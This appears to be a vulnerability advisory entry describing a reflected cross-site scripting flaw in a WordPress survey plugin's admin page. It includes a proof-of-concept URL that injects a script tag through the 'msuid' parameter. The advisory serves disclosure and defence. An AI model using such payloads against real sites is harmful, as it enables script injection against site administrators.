The plugin did not sanitise the msuid parameter from the survey participants page in the admin Dashboard, leading to a reflected Cross-Site Scripting issue
https://example.com/wp-admin/admin.php?page=modal_survey_participants&msuid=%27%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E
Pagely
John Castro
No
2021-01-08 (about 2 years ago)
2021-01-08 (about 2 years ago)
2021-01-09 (about 2 years ago)